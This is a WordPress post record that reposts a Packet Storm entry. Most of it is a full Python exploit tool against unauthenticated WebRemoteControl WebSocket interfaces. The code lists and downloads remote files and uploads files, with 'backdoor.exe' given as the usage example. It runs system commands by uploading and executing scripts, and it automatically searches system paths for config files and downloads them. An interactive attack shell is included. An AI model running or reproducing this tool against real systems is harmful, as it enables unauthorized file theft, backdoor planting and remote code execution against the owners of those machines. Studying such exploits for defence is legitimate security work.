{"id":59350,"date":"2026-06-02T13:39:26","date_gmt":"2026-06-02T13:39:26","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=59350"},"modified":"2026-06-02T13:39:26","modified_gmt":"2026-06-02T13:39:26","slug":"webremotecontrol-unauthenticated-remote-filesystem-access","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=59350","title":{"rendered":"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-02T18:25:51&#8243;,&#8221;description&#8221;:&#8221;Proof of concept tool that demonstrates how WebRemoteControl suffers from unauthenticated remote filesystem access and potential remote code execution&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:222526&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : WebRemoteControl \u2013 Unauthenticated Remote Filesystem Access \\u0026 Management Interface Assessment Tool               |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/github.com\/wolfgangasdf\/WebRemoteControl                                                                 |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : a security research and assessment tool targeting WebRemoteControl deployments that expose a WebSocket-based remote control interface without authentication. \\n                     The tool evaluates whether remote users can interact with the application&#8217;s file management functionality and access system resources through the exposed service.\\n    \\t\\t\\t\\t \\n    [+] POC        : python 1.py -t 192.168.1.100 &#8211;download config.ini\\n                                 -t 192.168.1.100 &#8211;auto\\n    \\t\\t\\t\\t\\t\\t\\t -t 192.168.1.100 &#8211;command \\&#8221;whoami\\&#8221;\\n    \\t\\t\\t\\t\\t\\t\\t -t 192.168.1.100 &#8211;upload backdoor.exe backdoor.exe\\n    \\t\\t\\t\\t\\t\\t\\t -t 192.168.1.100 &#8211;list-path \\&#8221;\/Windows\/System32\\&#8221;\\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import websocket\\n    import time\\n    import json\\n    import os\\n    import sys\\n    import argparse\\n    import base64\\n    import threading\\n    from datetime import datetime\\n    \\n    class WebRemoteControlExploit:\\n        def __init__(self, target_host, target_port=8000, ssl=False):\\n            \\&#8221;\\&#8221;\\&#8221;\\n            Initialize WebRemoteControl exploit\\n            \\&#8221;\\&#8221;\\&#8221;\\n            self.target_host = target_host\\n            self.target_port = target_port\\n            self.ssl = ssl\\n            self.ws_url = f\\&#8221;{&#8216;wss&#8217; if ssl else &#8216;ws&#8217;}:\/\/{target_host}:{target_port}\/docs\/cmd\\&#8221;\\n            self.ws = None\\n            self.current_path = \\&#8221;\/\\&#8221;\\n            self.file_cache = {}\\n            \\n        def connect(self):\\n            \\&#8221;\\&#8221;\\&#8221;Establish WebSocket connection\\&#8221;\\&#8221;\\&#8221;\\n            try:\\n                print(f\\&#8221;[*] Connecting to {self.ws_url}\\&#8221;)\\n                self.ws = websocket.create_connection(self.ws_url, timeout=10)\\n                welcome = self.ws.recv()\\n                print(f\\&#8221;[+] Connected successfully\\&#8221;)\\n                if welcome:\\n                    print(f\\&#8221;[*] Server response: {welcome[:100]}&#8230;\\&#8221;)\\n                return True\\n            except Exception as e:\\n                print(f\\&#8221;[-] Failed to connect: {e}\\&#8221;)\\n                return False\\n        \\n        def disconnect(self):\\n            \\&#8221;\\&#8221;\\&#8221;Close WebSocket connection\\&#8221;\\&#8221;\\&#8221;\\n            if self.ws:\\n                self.ws.close()\\n                print(\\&#8221;[*] Connection closed\\&#8221;)\\n        \\n        def send_command(self, command, wait_time=0.5):\\n            \\&#8221;\\&#8221;\\&#8221;Send command and receive response\\&#8221;\\&#8221;\\&#8221;\\n            try:\\n                self.ws.send(command)\\n                time.sleep(wait_time)\\n                response = self.ws.recv()\\n                return response\\n            except Exception as e:\\n                print(f\\&#8221;[-] Command failed: {e}\\&#8221;)\\n                return None\\n        \\n        def list_files(self, path=None):\\n            \\&#8221;\\&#8221;\\&#8221;List files in current or specified directory\\&#8221;\\&#8221;\\&#8221;\\n            if path:\\n                original_path = self.current_path\\n                self.navigate_to_path(path)\\n            \\n            response = self.send_command(\\&#8221;fbgetfiles\\&#8221;, 0.5)\\n            \\n            if response and response.startswith(\\&#8221;fblist\\&#8221;):\\n                parts = response.split(\\&#8221;\\\\t\\&#8221;)\\n                self.current_path = parts[1]\\n                files = parts[2:]\\n                \\n                print(f\\&#8221;\\\\n{&#8216;=&#8217;*60}\\&#8221;)\\n                print(f\\&#8221;[PATH] {self.current_path}\\&#8221;)\\n                print(f\\&#8221;{&#8216;=&#8217;*60}\\&#8221;)\\n                \\n                for i, item in enumerate(files):\\n                    is_dir = item.endswith(&#8216;\/&#8217;) or item.endswith(&#8216;\\\\\\\\&#8217;)\\n                    icon = \\&#8221;\\&#8221; if is_dir else \\&#8221;\\&#8221;\\n                    print(f\\&#8221;  [{i:2d}] {icon} {item}\\&#8221;)\\n                \\n                print(f\\&#8221;{&#8216;=&#8217;*60}\\&#8221;)\\n                print(f\\&#8221;Total: {len(files)} items\\\\n\\&#8221;)\\n                self.file_cache[self.current_path] = files\\n                return files\\n            \\n            elif response:\\n                print(f\\&#8221;[!] Unexpected response: {response}\\&#8221;)\\n                return None\\n            else:\\n                print(\\&#8221;[!] Failed to list files\\&#8221;)\\n                return None\\n        \\n        def open_item(self, index):\\n            \\&#8221;\\&#8221;\\&#8221;Open folder or execute file by index\\&#8221;\\&#8221;\\&#8221;\\n            try:\\n                idx = int(index)\\n                response = self.send_command(f\\&#8221;fbopen\\\\t{idx}\\&#8221;, 0.5)\\n                \\n                if response and response.startswith(\\&#8221;fblist\\&#8221;):\\n                    parts = response.split(\\&#8221;\\\\t\\&#8221;)\\n                    self.current_path = parts[1]\\n                    files = parts[2:]\\n                    print(f\\&#8221;[+] Opened folder: {self.current_path}\\&#8221;)\\n                    print(f\\&#8221;\\\\n{&#8216;=&#8217;*60}\\&#8221;)\\n                    print(f\\&#8221;[PATH] {self.current_path}\\&#8221;)\\n                    print(f\\&#8221;{&#8216;=&#8217;*60}\\&#8221;)\\n                    for i, item in enumerate(files):\\n                        icon = \\&#8221;\\&#8221; if (item.endswith(&#8216;\/&#8217;) or item.endswith(&#8216;\\\\\\\\&#8217;)) else \\&#8221;\\&#8221;\\n                        print(f\\&#8221;  [{i:2d}] {icon} {item}\\&#8221;)\\n                    print(f\\&#8221;{&#8216;=&#8217;*60}\\\\n\\&#8221;)\\n                    \\n                    self.file_cache[self.current_path] = files\\n                    return True\\n                    \\n                elif response:\\n                    print(f\\&#8221;[+] File executed on remote host\\&#8221;)\\n                    print(f\\&#8221;[*] Response: {response[:200]}\\&#8221;)\\n                    return True\\n                else:\\n                    print(\\&#8221;[!] Failed to open item\\&#8221;)\\n                    return False\\n                    \\n            except ValueError:\\n                print(\\&#8221;[-] Invalid index. Use numbers only\\&#8221;)\\n                return False\\n            except Exception as e:\\n                print(f\\&#8221;[-] Error opening item: {e}\\&#8221;)\\n                return False\\n        \\n        def go_up(self):\\n            \\&#8221;\\&#8221;\\&#8221;Navigate to parent directory\\&#8221;\\&#8221;\\&#8221;\\n            response = self.send_command(\\&#8221;fbup\\&#8221;, 0.5)\\n            \\n            if response and response.startswith(\\&#8221;fblist\\&#8221;):\\n                parts = response.split(\\&#8221;\\\\t\\&#8221;)\\n                self.current_path = parts[1]\\n                files = parts[2:]\\n                print(f\\&#8221;[+] Moved to parent: {self.current_path}\\&#8221;)\\n                print(f\\&#8221;\\\\n{&#8216;=&#8217;*60}\\&#8221;)\\n                print(f\\&#8221;[PATH] {self.current_path}\\&#8221;)\\n                print(f\\&#8221;{&#8216;=&#8217;*60}\\&#8221;)\\n                for i, item in enumerate(files):\\n                    icon = \\&#8221;\\&#8221; if (item.endswith(&#8216;\/&#8217;) or item.endswith(&#8216;\\\\\\\\&#8217;)) else \\&#8221;\\&#8221;\\n                    print(f\\&#8221;  [{i:2d}] {icon} {item}\\&#8221;)\\n                print(f\\&#8221;{&#8216;=&#8217;*60}\\\\n\\&#8221;)\\n                \\n                self.file_cache[self.current_path] = files\\n                return True\\n            else:\\n                print(\\&#8221;[!] Already at root or cannot go up\\&#8221;)\\n                return False\\n        \\n        def navigate_to_path(self, target_path):\\n            \\&#8221;\\&#8221;\\&#8221;Navigate to a specific path\\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;[*] Navigating to: {target_path}\\&#8221;)\\n            target_path = target_path.replace(&#8216;\\\\\\\\&#8217;, &#8216;\/&#8217;)\\n            current_parts = self.current_path.replace(&#8216;\\\\\\\\&#8217;, &#8216;\/&#8217;).split(&#8216;\/&#8217;)\\n            target_parts = target_path.split(&#8216;\/&#8217;)\\n            common = 0\\n            for i in range(min(len(current_parts), len(target_parts))):\\n                if current_parts[i] == target_parts[i]:\\n                    common += 1\\n                else:\\n                    break\\n            for _ in range(len(current_parts) &#8211; common &#8211; 1):\\n                if not self.go_up():\\n                    return False\\n            for part in target_parts[common:]:\\n                if part and part != &#8221;:\\n                    files = self.list_files()\\n                    if not files:\\n                        return False\\n                    \\n                    found = False\\n                    for i, item in enumerate(files):\\n                        if item.strip(&#8216;\/\\\\\\\\&#8217;) == part:\\n                            if self.open_item(i):\\n                                found = True\\n                                break\\n                    \\n                    if not found:\\n                        print(f\\&#8221;[-] Cannot find directory: {part}\\&#8221;)\\n                        return False\\n            \\n            print(f\\&#8221;[+] Successfully navigated to: {self.current_path}\\&#8221;)\\n            return True\\n        \\n        def download_file(self, filename):\\n            \\&#8221;\\&#8221;\\&#8221;Download file from remote system\\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;[*] Attempting to download: {filename}\\&#8221;)\\n            files = self.list_files()\\n            if not files:\\n                return False\\n            file_index = None\\n            for i, item in enumerate(files):\\n                if item == filename or item.endswith(filename):\\n                    file_index = i\\n                    break\\n            \\n            if file_index is None:\\n                print(f\\&#8221;[-] File not found: {filename}\\&#8221;)\\n                return False\\n            print(f\\&#8221;[*] Opening file (index {file_index})&#8230;\\&#8221;)\\n            response = self.send_command(f\\&#8221;fbopen\\\\t{file_index}\\&#8221;, 1)\\n            \\n            if response:\\n                output_file = f\\&#8221;downloaded_{filename}\\&#8221;\\n                with open(output_file, &#8216;wb&#8217;) as f:\\n                    f.write(response.encode(&#8216;utf-8&#8217;))\\n                print(f\\&#8221;[+] File saved as: {output_file}\\&#8221;)\\n                return True\\n            \\n            return False\\n        \\n        def upload_file(self, local_path, remote_name=None):\\n            \\&#8221;\\&#8221;\\&#8221;Upload file to remote system\\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;[*] Uploading file: {local_path}\\&#8221;)\\n            \\n            if not os.path.exists(local_path):\\n                print(f\\&#8221;[-] Local file not found: {local_path}\\&#8221;)\\n                return False\\n            with open(local_path, &#8216;rb&#8217;) as f:\\n                content = f.read()\\n            encoded = base64.b64encode(content).decode(&#8216;ascii&#8217;)\\n            remote_name = remote_name or os.path.basename(local_path)\\n            command = f\\&#8221;fbupload\\\\t{remote_name}\\\\t{encoded}\\&#8221;\\n            response = self.send_command(command, 2)\\n            \\n            if response and \\&#8221;success\\&#8221; in response.lower():\\n                print(f\\&#8221;[+] File uploaded successfully: {remote_name}\\&#8221;)\\n                return True\\n            else:\\n                print(f\\&#8221;[-] Upload failed: {response}\\&#8221;)\\n                return False\\n        \\n        def execute_command(self, command):\\n            \\&#8221;\\&#8221;\\&#8221;Execute system command via file execution\\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;[*] Executing command: {command}\\&#8221;)\\n            if sys.platform == \\&#8221;win32\\&#8221;:\\n                script_name = f\\&#8221;temp_{int(time.time())}.bat\\&#8221;\\n                script_content = f\\&#8221;@echo off\\\\n{command}\\\\necho [COMPLETE]\\\\npause\\&#8221;\\n            else:\\n                script_name = f\\&#8221;temp_{int(time.time())}.sh\\&#8221;\\n                script_content = f\\&#8221;#!\/bin\/bash\\\\n{command}\\\\necho &#8216;[COMPLETE]&#8217;\\&#8221;\\n           \\n            with open(script_name, &#8216;w&#8217;) as f:\\n                f.write(script_content)\\n            \\n            if self.upload_file(script_name):\\n                time.sleep(1)\\n                self.list_files()\\n                files = self.list_files()\\n                for i, item in enumerate(files):\\n                    if item == script_name:\\n                        print(f\\&#8221;[*] Executing uploaded script&#8230;\\&#8221;)\\n                        self.open_item(i)\\n                        break\\n            if os.path.exists(script_name):\\n                os.remove(script_name)\\n            \\n            return True\\n        \\n        def recursive_list(self, path=\\&#8221;\\&#8221;, max_depth=3, current_depth=0):\\n            \\&#8221;\\&#8221;\\&#8221;Recursively list directory contents\\&#8221;\\&#8221;\\&#8221;\\n            if current_depth \\u003e= max_depth:\\n                return\\n            \\n            if path:\\n                self.navigate_to_path(path)\\n            else:\\n                self.list_files()\\n            \\n            files = self.file_cache.get(self.current_path, [])\\n            \\n            for i, item in enumerate(files):\\n                indent = \\&#8221;  \\&#8221; * current_depth\\n                if item.endswith(&#8216;\/&#8217;) or item.endswith(&#8216;\\\\\\\\&#8217;):\\n                    print(f\\&#8221;{indent} {item}\\&#8221;)\\n                    self.open_item(i)\\n                    self.recursive_list(\\&#8221;\\&#8221;, max_depth, current_depth + 1)\\n                    self.go_up()\\n                else:\\n                    print(f\\&#8221;{indent} {item}\\&#8221;)\\n        \\n        def interactive_shell(self):\\n            \\&#8221;\\&#8221;\\&#8221;Interactive file browser shell\\&#8221;\\&#8221;\\&#8221;\\n            print(\\&#8221;\\&#8221;\\&#8221;\\n    \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n    \u2551        WebRemoteControl &#8211; File Browser Exploit                \u2551\\n    \u2551       Unauthenticated Remote Filesystem Access                \u2551\\n    \u2551                   by indoushka                                \u2551\\n    \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n    \\n    Commands:\\n      list \/ ls              &#8211; Show current directory contents\\n      open \\u003cindex\\u003e           &#8211; Open folder or execute file\\n      up \/ cd..              &#8211; Go to parent directory\\n      cd \\u003cpath\\u003e              &#8211; Change to specific directory\\n      download \\u003cfilename\\u003e    &#8211; Download file\\n      upload \\u003clocal_file\\u003e    &#8211; Upload file\\n      exec \\u003ccommand\\u003e         &#8211; Execute system command\\n      tree [depth]           &#8211; Recursive directory listing\\n      pwd                    &#8211; Show current path\\n      search \\u003cpattern\\u003e       &#8211; Search for files\\n      exit \/ quit            &#8211; Exit exploit\\n    \\n    Examples:\\n      \\u003e list\\n      \\u003e open 5\\n      \\u003e cd Windows\/System32\\n      \\u003e download config.ini\\n      \\u003e upload backup.zip\\n      \\u003e exec whoami\\n      \\u003e tree 2\\n    \\&#8221;\\&#8221;\\&#8221;)\\n            \\n            while True:\\n                try:\\n                    cmd = input(f\\&#8221;\\\\n[{self.current_path}]\\u003e \\&#8221;).strip().lower()\\n                    \\n                    if not cmd:\\n                        continue\\n                    \\n                    if cmd in [&#8216;list&#8217;, &#8216;ls&#8217;]:\\n                        self.list_files()\\n                    \\n                    elif cmd.startswith(&#8216;open&#8217;):\\n                        parts = cmd.split()\\n                        if len(parts) == 2:\\n                            self.open_item(parts[1])\\n                        else:\\n                            print(\\&#8221;Usage: open \\u003cindex\\u003e\\&#8221;)\\n                    \\n                    elif cmd in [&#8216;up&#8217;, &#8216;cd..&#8217;]:\\n                        self.go_up()\\n                    \\n                    elif cmd.startswith(&#8216;cd &#8216;):\\n                        target_path = cmd[3:].strip()\\n                        if target_path == &#8216;..&#8217;:\\n                            self.go_up()\\n                        else:\\n                            self.navigate_to_path(target_path)\\n                    \\n                    elif cmd.startswith(&#8216;download &#8216;):\\n                        filename = cmd[9:].strip()\\n                        self.download_file(filename)\\n                    \\n                    elif cmd.startswith(&#8216;upload &#8216;):\\n                        local_file = cmd[7:].strip()\\n                        self.upload_file(local_file)\\n                    \\n                    elif cmd.startswith(&#8216;exec &#8216;):\\n                        command = cmd[5:].strip()\\n                        self.execute_command(command)\\n                    \\n                    elif cmd.startswith(&#8216;tree&#8217;):\\n                        depth = 3\\n                        if len(cmd.split()) \\u003e 1:\\n                            try:\\n                                depth = int(cmd.split()[1])\\n                            except:\\n                                pass\\n                        print(\\&#8221;\\\\n[*] Recursive directory listing:\\&#8221;)\\n                        print(\\&#8221;=\\&#8221;*60)\\n                        self.recursive_list(\\&#8221;\\&#8221;, depth)\\n                    \\n                    elif cmd == &#8216;pwd&#8217;:\\n                        print(f\\&#8221;Current path: {self.current_path}\\&#8221;)\\n                    \\n                    elif cmd.startswith(&#8216;search &#8216;):\\n                        pattern = cmd[7:].strip()\\n                        self.search_files(pattern)\\n                    \\n                    elif cmd in [&#8216;exit&#8217;, &#8216;quit&#8217;]:\\n                        print(\\&#8221;[*] Exiting&#8230;\\&#8221;)\\n                        break\\n                    \\n                    else:\\n                        print(\\&#8221;Unknown command. Type &#8216;help&#8217; for available commands\\&#8221;)\\n                        \\n                except KeyboardInterrupt:\\n                    print(\\&#8221;\\\\n[*] Interrupted\\&#8221;)\\n                    break\\n                except Exception as e:\\n                    print(f\\&#8221;[-] Error: {e}\\&#8221;)\\n        \\n        def search_files(self, pattern):\\n            \\&#8221;\\&#8221;\\&#8221;Search for files matching pattern\\&#8221;\\&#8221;\\&#8221;\\n            print(f\\&#8221;[*] Searching for: {pattern}\\&#8221;)\\n            found = []\\n            \\n            def search_recursive(depth=0, max_depth=3):\\n                if depth \\u003e= max_depth:\\n                    return\\n                \\n                files = self.list_files()\\n                if not files:\\n                    return\\n                \\n                for i, item in enumerate(files):\\n                    if pattern.lower() in item.lower():\\n                        found.append({\\n                            &#8216;path&#8217;: self.current_path,\\n                            &#8216;name&#8217;: item,\\n                            &#8216;index&#8217;: i\\n                        })\\n                    \\n                    if item.endswith(&#8216;\/&#8217;) or item.endswith(&#8216;\\\\\\\\&#8217;):\\n                        self.open_item(i)\\n                        search_recursive(depth + 1, max_depth)\\n                        self.go_up()\\n            original_path = self.current_path\\n            search_recursive()\\n            \\n            if found:\\n                print(f\\&#8221;\\\\n[+] Found {len(found)} matches:\\&#8221;)\\n                for match in found:\\n                    print(f\\&#8221; {match[&#8216;path&#8217;]}{match[&#8216;name&#8217;]} (index {match[&#8216;index&#8217;]})\\&#8221;)\\n            else:\\n                print(\\&#8221;[-] No matches found\\&#8221;)\\n            self.navigate_to_path(original_path)\\n    \\n    def auto_exploit(target_host, target_port=8000):\\n        \\&#8221;\\&#8221;\\&#8221;Automated exploit sequence\\&#8221;\\&#8221;\\&#8221;\\n        exploit = WebRemoteControlExploit(target_host, target_port)\\n        \\n        if not exploit.connect():\\n            return False\\n        \\n        print(\\&#8221;\\\\n[*] Starting automated exploitation&#8230;\\&#8221;)\\n        print(\\&#8221;=\\&#8221;*60)\\n        exploit.list_files()\\n        sensitive_paths = [\\n            \\&#8221;\/Windows\/System32\/config\\&#8221;,\\n            \\&#8221;\/Users\\&#8221;,\\n            \\&#8221;\/Program Files\\&#8221;,\\n            \\&#8221;\/Windows\/System32\/drivers\/etc\\&#8221;,\\n            \\&#8221;\/inetpub\/wwwroot\\&#8221;,\\n            \\&#8221;\/xampp\/htdocs\\&#8221;\\n        ]\\n        \\n        for path in sensitive_paths:\\n            print(f\\&#8221;\\\\n[*] Checking: {path}\\&#8221;)\\n            if exploit.navigate_to_path(path):\\n                exploit.list_files()\\n                sensitive_files = [&#8216;hosts&#8217;, &#8216;config&#8217;, &#8216;.ini&#8217;, &#8216;.conf&#8217;, &#8216;web.config&#8217;]\\n                files = exploit.file_cache.get(exploit.current_path, [])\\n                for file in files:\\n                    for sensitive in sensitive_files:\\n                        if sensitive in file.lower():\\n                            print(f\\&#8221;[!] Found sensitive file: {file}\\&#8221;)\\n                            exploit.download_file(file)\\n        \\n        print(\\&#8221;\\\\n[+] Automated exploitation completed\\&#8221;)\\n        return True\\n    \\n    def main():\\n        parser = argparse.ArgumentParser(description=&#8217;WebRemoteControl &#8211; Unauthenticated Remote Filesystem Access Exploit&#8217;)\\n        parser.add_argument(&#8216;-t&#8217;, &#8216;&#8211;target&#8217;, required=True, help=&#8217;Target IP address&#8217;)\\n        parser.add_argument(&#8216;-p&#8217;, &#8216;&#8211;port&#8217;, type=int, default=8000, help=&#8217;Target port (default: 8000)&#8217;)\\n        parser.add_argument(&#8216;&#8211;ssl&#8217;, action=&#8217;store_true&#8217;, help=&#8217;Use WSS instead of WS&#8217;)\\n        parser.add_argument(&#8216;&#8211;auto&#8217;, action=&#8217;store_true&#8217;, help=&#8217;Run automated exploitation&#8217;)\\n        parser.add_argument(&#8216;&#8211;command&#8217;, help=&#8217;Execute single command and exit&#8217;)\\n        parser.add_argument(&#8216;&#8211;download&#8217;, help=&#8217;Download file from remote system&#8217;)\\n        parser.add_argument(&#8216;&#8211;upload&#8217;, nargs=2, metavar=(&#8216;LOCAL&#8217;, &#8216;REMOTE&#8217;), help=&#8217;Upload file (local remote)&#8217;)\\n        parser.add_argument(&#8216;&#8211;list-path&#8217;, help=&#8217;List specific path&#8217;)\\n        \\n        args = parser.parse_args()\\n        \\n        exploit = WebRemoteControlExploit(args.target, args.port, args.ssl)\\n        \\n        if not exploit.connect():\\n            sys.exit(1)\\n        if args.command:\\n            exploit.execute_command(args.command)\\n            exploit.disconnect()\\n            sys.exit(0)\\n        if args.download:\\n            exploit.download_file(args.download)\\n            exploit.disconnect()\\n            sys.exit(0)\\n        if args.upload:\\n            local_file, remote_name = args.upload\\n            exploit.upload_file(local_file, remote_name)\\n            exploit.disconnect()\\n            sys.exit(0)\\n        if args.list_path:\\n            exploit.navigate_to_path(args.list_path)\\n            exploit.list_files()\\n            exploit.disconnect()\\n            sys.exit(0)\\n        if args.auto:\\n            auto_exploit(args.target, args.port)\\n            exploit.disconnect()\\n            sys.exit(0)\\n        try:\\n            exploit.interactive_shell()\\n        except KeyboardInterrupt:\\n            print(\\&#8221;\\\\n[*] Interrupted by user\\&#8221;)\\n        finally:\\n            exploit.disconnect()\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()\\n    \\t\\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/222526&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/222526\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-02T18:25:51&#8243;,&#8221;description&#8221;:&#8221;Proof of concept tool that demonstrates how WebRemoteControl suffers from unauthenticated remote filesystem access and potential remote code execution&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:222526&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n |&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-59350","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=59350\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-06-02T18:25:51&#8243;,&#8221;description&#8221;:&#8221;Proof of concept tool that demonstrates how WebRemoteControl suffers from unauthenticated remote filesystem access and potential remote code execution&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:222526&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================n |...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=59350\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-02T13:39:26+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" 